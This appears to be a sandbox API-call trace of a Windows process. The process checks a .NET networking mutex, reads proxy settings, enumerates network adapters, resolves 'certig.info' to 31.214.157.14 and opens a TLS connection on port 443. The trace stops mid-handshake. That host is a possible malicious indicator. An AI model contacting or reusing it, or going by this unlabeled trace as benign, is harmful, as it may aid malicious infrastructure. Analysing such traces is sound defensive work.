	[0188.642] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cd98f8, cbSid=0x5e4ee6c | out: pSid=0x2cd98f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee6c) returned 1
	[0188.642] GetLastError () returned 0x0
	[0188.643] CreateMutexW (lpMutexAttributes=0x2cd9a08, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.643] GetLastError () returned 0x0
	[0188.643] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.643] GetLastError () returned 0x0
	[0188.643] ReleaseMutex (hMutex=0x424) returned 1
	[0188.643] GetLastError () returned 0x0
	[0188.644] CloseHandle (hObject=0x424) returned 1
	[0188.644] GetLastError () returned 0x0
	[0188.644] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cda174, cbSid=0x5e4ee6c | out: pSid=0x2cda174*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee6c) returned 1
	[0188.644] GetLastError () returned 0x0
	[0188.644] CreateMutexW (lpMutexAttributes=0x2cda284, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.644] GetLastError () returned 0x0
	[0188.644] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.645] GetLastError () returned 0x0
	[0188.645] ReleaseMutex (hMutex=0x424) returned 1
	[0188.645] GetLastError () returned 0x0
	[0188.645] CloseHandle (hObject=0x424) returned 1
	[0188.645] GetLastError () returned 0x0
	[0188.645] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cda9e8, cbSid=0x5e4ee6c | out: pSid=0x2cda9e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee6c) returned 1
	[0188.645] GetLastError () returned 0x0
	[0188.646] CreateMutexW (lpMutexAttributes=0x2cdaaf8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.646] GetLastError () returned 0x0
	[0188.646] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.646] GetLastError () returned 0x0
	[0188.646] ReleaseMutex (hMutex=0x424) returned 1
	[0188.646] GetLastError () returned 0x0
	[0188.646] CloseHandle (hObject=0x424) returned 1
	[0188.646] GetLastError () returned 0x0
	[0188.646] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cdb26c, cbSid=0x5e4ee6c | out: pSid=0x2cdb26c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee6c) returned 1
	[0188.647] GetLastError () returned 0x0
	[0188.647] CreateMutexW (lpMutexAttributes=0x2cdb37c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.647] GetLastError () returned 0x0
	[0188.647] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.647] GetLastError () returned 0x0
	[0188.648] ReleaseMutex (hMutex=0x424) returned 1
	[0188.648] GetLastError () returned 0x0
	[0188.648] CloseHandle (hObject=0x424) returned 1
	[0188.648] GetLastError () returned 0x0
	[0188.648] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cdbae8, cbSid=0x5e4ee6c | out: pSid=0x2cdbae8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee6c) returned 1
	[0188.648] GetLastError () returned 0x0
	[0188.648] CreateMutexW (lpMutexAttributes=0x2cdbbf8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.649] GetLastError () returned 0x0
	[0188.649] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.649] GetLastError () returned 0x0
	[0188.649] ReleaseMutex (hMutex=0x424) returned 1
	[0188.649] GetLastError () returned 0x0
	[0188.649] CloseHandle (hObject=0x424) returned 1
	[0188.649] GetLastError () returned 0x0
	[0188.651] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x424
	[0188.651] GetLastError () returned 0x0
	[0188.671] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430
	[0188.671] GetLastError () returned 0x0
	[0188.673] ioctlsocket (in: s=0x424, cmd=-2147195266, argp=0x5e4f0b8 | out: argp=0x5e4f0b8) returned 0
	[0188.673] GetLastError () returned 0x0
	[0188.673] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x434
	[0188.674] GetLastError () returned 0x0
	[0188.674] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438
	[0188.674] GetLastError () returned 0x0
	[0188.674] ioctlsocket (in: s=0x434, cmd=-2147195266, argp=0x5e4f0b8 | out: argp=0x5e4f0b8) returned 0
	[0188.674] GetLastError () returned 0x0
	[0188.675] WSAIoctl (in: s=0x424, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5e4f09c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5e4f09c, lpOverlapped=0x0) returned -1
	[0188.676] GetLastError () returned 0x2733
	[0188.677] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3a12d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0188.677] GetLastError () returned 0x2733
	[0188.679] WSAEventSelect (s=0x424, hEventObject=0x430, lNetworkEvents=512) returned 0
	[0188.679] GetLastError () returned 0x0
	[0188.679] WSAIoctl (in: s=0x434, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5e4f09c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5e4f09c, lpOverlapped=0x0) returned -1
	[0188.679] GetLastError () returned 0x2733
	[0188.679] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3a12d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0188.679] GetLastError () returned 0x2733
	[0188.680] WSAEventSelect (s=0x434, hEventObject=0x438, lNetworkEvents=512) returned 0
	[0188.680] GetLastError () returned 0x0
	[0188.680] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x43c
	[0188.680] GetLastError () returned 0x0
	[0188.682] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x43c, param_3=0x3) returned 0x0
	[0188.688] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x5e4f080 | out: phkResult=0x5e4f080*=0x454) returned 0x0
	[0188.688] GetLastError () returned 0x0
	[0188.723] RegOpenKeyExW (in: hKey=0x454, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e4f03c | out: phkResult=0x5e4f03c*=0x458) returned 0x0
	[0188.723] GetLastError () returned 0x0
	[0188.723] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x45c
	[0188.723] GetLastError () returned 0x0
	[0188.725] RegNotifyChangeKeyValue (hKey=0x458, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x45c, fAsynchronous=1) returned 0x0
	[0188.725] GetLastError () returned 0x0
	[0188.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e4f03c | out: phkResult=0x5e4f03c*=0x460) returned 0x0
	[0188.727] GetLastError () returned 0x0
	[0188.727] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x464
	[0188.728] GetLastError () returned 0x0
	[0188.728] RegNotifyChangeKeyValue (hKey=0x460, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x464, fAsynchronous=1) returned 0x0
	[0188.728] GetLastError () returned 0x0
	[0188.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e4f03c | out: phkResult=0x5e4f03c*=0x468) returned 0x0
	[0188.728] GetLastError () returned 0x0
	[0188.728] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x46c
	[0188.728] GetLastError () returned 0x0
	[0188.728] RegNotifyChangeKeyValue (hKey=0x468, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x46c, fAsynchronous=1) returned 0x0
	[0188.728] GetLastError () returned 0x0
	[0188.729] GetCurrentProcess () returned 0xffffffff
	[0188.729] GetLastError () returned 0x3f0
	[0188.729] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4f024 | out: TokenHandle=0x5e4f024*=0x470) returned 1
	[0188.729] GetLastError () returned 0x3f0
	[0188.736] GetCurrentProcess () returned 0xffffffff
	[0188.736] GetLastError () returned 0x3f0
	[0188.736] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ec40 | out: TokenHandle=0x5e4ec40*=0x474) returned 1
	[0188.736] GetLastError () returned 0x3f0
	[0188.740] GetCurrentProcess () returned 0xffffffff
	[0188.740] GetLastError () returned 0x3f0
	[0188.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ec50 | out: TokenHandle=0x5e4ec50*=0x478) returned 1
	[0188.740] GetLastError () returned 0x3f0
	[0188.892] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x332a00 | out: pProxyConfig=0x332a00) returned 1
	[0189.855] GetLastError () returned 0x0
	[0189.871] SetEvent (hEvent=0x398) returned 1
	[0189.871] GetLastError () returned 0x0
	[0189.965] GetCurrentProcess () returned 0xffffffff
	[0189.965] GetLastError () returned 0x3f0
	[0189.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ec78 | out: TokenHandle=0x5e4ec78*=0x4d0) returned 1
	[0189.966] GetLastError () returned 0x3f0
	[0189.968] GetCurrentProcess () returned 0xffffffff
	[0189.968] GetLastError () returned 0x3f0
	[0189.968] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ec88 | out: TokenHandle=0x5e4ec88*=0x4d4) returned 1
	[0189.968] GetLastError () returned 0x3f0
	[0189.969] SetEvent (hEvent=0x398) returned 1
	[0189.969] GetLastError () returned 0x3f0
	[0190.037] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x5e4efd8 | out: pFixedInfo=0x0, pOutBufLen=0x5e4efd8) returned 0x6f
	[0190.384] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x3be9e8
	[0190.384] GetLastError () returned 0x0
	[0190.384] GetNetworkParams (in: pFixedInfo=0x3be9e8, pOutBufLen=0x5e4efd8 | out: pFixedInfo=0x3be9e8, pOutBufLen=0x5e4efd8) returned 0x0
	[0190.432] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0190.432] GetLastError () returned 0x0
	[0190.444] LocalFree (hMem=0x3be9e8) returned 0x0
	[0190.444] GetLastError () returned 0x0
	[0190.449] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e8
	[0190.450] GetLastError () returned 0x0
	[0190.450] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0190.450] GetLastError () returned 0x0
	[0190.456] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5e4eeb4*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5e4ec48 | out: ppResult=0x5e4ec48*=0x3afad8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x3b3868*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0191.177] GetLastError () returned 0x0
	[0191.178] FreeAddrInfoW (pAddrInfo=0x3afad8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰Իӳ嵬2蠀䬘8㟀;㙸,\x01", ai_addr=0x3b3868*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0191.178] GetLastError () returned 0x0
	[0191.179] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f8
	[0191.180] GetLastError () returned 0x0
	[0191.180] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f0
	[0191.180] GetLastError () returned 0x0
	[0191.180] ioctlsocket (in: s=0x4f8, cmd=-2147195266, argp=0x5e4ee98 | out: argp=0x5e4ee98) returned 0
	[0191.180] GetLastError () returned 0x0
	[0191.180] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x500
	[0191.180] GetLastError () returned 0x0
	[0191.181] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x504
	[0191.181] GetLastError () returned 0x0
	[0191.181] ioctlsocket (in: s=0x500, cmd=-2147195266, argp=0x5e4ee98 | out: argp=0x5e4ee98) returned 0
	[0191.181] GetLastError () returned 0x0
	[0191.181] WSAIoctl (in: s=0x4f8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5e4ee7c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5e4ee7c, lpOverlapped=0x0) returned -1
	[0191.181] GetLastError () returned 0x2733
	[0191.181] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3a12d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0191.181] GetLastError () returned 0x2733
	[0191.181] WSAEventSelect (s=0x4f8, hEventObject=0x4f0, lNetworkEvents=512) returned 0
	[0191.181] GetLastError () returned 0x0
	[0191.181] WSAIoctl (in: s=0x500, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5e4ee7c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5e4ee7c, lpOverlapped=0x0) returned -1
	[0191.181] GetLastError () returned 0x2733
	[0191.181] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3a12d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0191.181] GetLastError () returned 0x2733
	[0191.181] WSAEventSelect (s=0x500, hEventObject=0x504, lNetworkEvents=512) returned 0
	[0191.181] GetLastError () returned 0x0
	[0191.183] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x5e4ee78*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x5e4ee78*=0xa5c) returned 0x6f
	[0191.201] LocalAlloc (uFlags=0x0, uBytes=0xa5c) returned 0x6010048
	[0191.201] GetLastError () returned 0x0
	[0191.201] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x6010048, SizePointer=0x5e4ee78*=0xa5c | out: AdapterAddresses=0x6010048*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x601030c, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x6010280, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x60101c0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x5e4ee78*=0xa5c) returned 0x0
	[0191.263] LocalFree (hMem=0x6010048) returned 0x0
	[0191.263] GetLastError () returned 0x0
	[0191.276] WSAConnect (in: s=0x4e8, name=0x2ce33f8*(sa_family=2, sin_port=0x1bb, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0191.319] GetLastError () returned 0x0
	[0191.320] closesocket (s=0x4e4) returned 0
	[0191.321] GetLastError () returned 0x0
	[0191.396] EnumerateSecurityPackagesW (in: pcPackages=0x5e4ee20, ppPackageInfo=0x5e4ed90 | out: pcPackages=0x5e4ee20, ppPackageInfo=0x5e4ed90) returned 0x0
	[0191.396] GetLastError () returned 0x0
	[0191.400] lstrlenW (lpString="Negotiate") returned 9
	[0191.401] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bef20, Length=0x14 | out: Destination=0x332a00) 
	[0191.401] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0191.401] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bef34, Length=0x3a | out: Destination=0x332a00) 
	[0191.402] lstrlenW (lpString="NegoExtender") returned 12
	[0191.402] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bef6e, Length=0x1a | out: Destination=0x332a00) 
	[0191.402] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0191.402] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bef88, Length=0x3c | out: Destination=0x332a00) 
	[0191.402] lstrlenW (lpString="Kerberos") returned 8
	[0191.402] RtlMoveMemory (in: Destination=0x332a00, Source=0x3befc4, Length=0x12 | out: Destination=0x332a00) 
	[0191.402] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0191.402] RtlMoveMemory (in: Destination=0x332a00, Source=0x3befd6, Length=0x30 | out: Destination=0x332a00) 
	[0191.403] lstrlenW (lpString="NTLM") returned 4
	[0191.403] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf006, Length=0xa | out: Destination=0x332a00) 
	[0191.403] lstrlenW (lpString="NTLM Security Package") returned 21
	[0191.403] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf010, Length=0x2c | out: Destination=0x332a00) 
	[0191.403] lstrlenW (lpString="Schannel") returned 8
	[0191.403] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf03c, Length=0x12 | out: Destination=0x332a00) 
	[0191.403] lstrlenW (lpString="Schannel Security Package") returned 25
	[0191.403] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf04e, Length=0x34 | out: Destination=0x332a00) 
	[0191.403] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0191.404] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf082, Length=0x5a | out: Destination=0x332a00) 
	[0191.404] lstrlenW (lpString="Schannel Security Package") returned 25
	[0191.404] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf0dc, Length=0x34 | out: Destination=0x332a00) 
	[0191.404] lstrlenW (lpString="WDigest") returned 7
	[0191.404] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf110, Length=0x10 | out: Destination=0x332a00) 
	[0191.404] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0191.404] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf120, Length=0x44 | out: Destination=0x332a00) 
	[0191.405] lstrlenW (lpString="TSSSP") returned 5
	[0191.405] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf164, Length=0xc | out: Destination=0x332a00) 
	[0191.405] lstrlenW (lpString="TS Service Security Package") returned 27
	[0191.405] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf170, Length=0x38 | out: Destination=0x332a00) 
	[0191.405] lstrlenW (lpString="pku2u") returned 5
	[0191.405] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf1a8, Length=0xc | out: Destination=0x332a00) 
	[0191.405] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0191.405] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf1b4, Length=0x2e | out: Destination=0x332a00) 
	[0191.406] lstrlenW (lpString="CREDSSP") returned 7
	[0191.406] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf1e2, Length=0x10 | out: Destination=0x332a00) 
	[0191.406] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0191.406] RtlMoveMemory (in: Destination=0x332a00, Source=0x3bf1f2, Length=0x48 | out: Destination=0x332a00) 
	[0191.409] FreeContextBuffer (in: pvContextBuffer=0x3bee58 | out: pvContextBuffer=0x3bee58) returned 0x0
	[0191.409] GetLastError () returned 0x7f
	[0191.466] GetCurrentProcess () returned 0xffffffff
	[0191.466] GetLastError () returned 0x3f0
	[0191.466] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ebe8 | out: TokenHandle=0x5e4ebe8*=0x4e4) returned 1
	[0191.466] GetLastError () returned 0x3f0
	[0191.478] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2ce625c, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x5e4ec84, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x2ce7ac4, ptsExpiry=0x5e4ebf0 | out: phCredential=0x2ce7ac4, ptsExpiry=0x5e4ebf0) returned 0x0
	[0191.871] GetLastError () returned 0x0
	[0191.876] InitializeSecurityContextW (in: phCredential=0x5e4ebec, phContext=0x0, pTargetName=0x2ccc138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x2ce7cf4, pOutput=0x2ce7c8c, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4ebe4 | out: phNewContext=0x2ce7cf4, pOutput=0x2ce7c8c, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4ebe4) returned 0x90312
	[0191.884] GetLastError () returned 0x0
	[0191.884] FreeContextBuffer (in: pvContextBuffer=0x326008 | out: pvContextBuffer=0x326008) returned 0x0
	[0191.884] GetLastError () returned 0x0
	[0191.930] send (s=0x4e8, buf=0x2ce7d08*, len=115, flags=0) returned 115
	[0191.931] GetLastError () returned 0x0
	[0191.932] recv (in: s=0x4e8, buf=0x2ce7d08, len=5, flags=0 | out: buf=0x2ce7d08*) returned 5
	[0191.961] GetLastError () returned 0x0
	[0191.961] recv (in: s=0x4e8, buf=0x2ce7d0d, len=93, flags=0 | out: buf=0x2ce7d0d*) returned 93
	[0191.961] GetLastError () returned 0x0
	[0191.963] InitializeSecurityContextW (in: phCredential=0x5e4eb2c, phContext=0x5e4ec40, pTargetName=0x2ccc138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ce7f50, Reserved2=0x0, phNewContext=0x2ce7cf4, pOutput=0x2ce7f64, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4eb24 | out: phNewContext=0x2ce7cf4, pOutput=0x2ce7f64, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4eb24) returned 0x90312
	[0191.968] GetLastError () returned 0x0
	[0191.968] recv (in: s=0x4e8, buf=0x2ce7ff4, len=5, flags=0 | out: buf=0x2ce7ff4*) returned 5
	[0191.968] GetLastError () returned 0x0
	[0191.968] recv (in: s=0x4e8, buf=0x2ce800d, len=2549, flags=0 | out: buf=0x2ce800d*) returned 2549
	[0191.968] GetLastError () returned 0x0
	[0191.968] InitializeSecurityContextW (in: phCredential=0x5e4ea74, phContext=0x5e4eb88, pTargetName=0x2ccc138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ce8a78, Reserved2=0x0, phNewContext=0x2ce7cf4, pOutput=0x2ce8a8c, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4ea6c | out: phNewContext=0x2ce7cf4, pOutput=0x2ce8a8c, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4ea6c) returned 0x90312
	[0191.970] GetLastError () returned 0x0
	[0191.970] recv (in: s=0x4e8, buf=0x2ce8b1c, len=5, flags=0 | out: buf=0x2ce8b1c*) returned 5
	[0191.970] GetLastError () returned 0x0
	[0191.970] recv (in: s=0x4e8, buf=0x2ce8b35, len=331, flags=0 | out: buf=0x2ce8b35*) returned 331
	[0191.971] GetLastError () returned 0x0
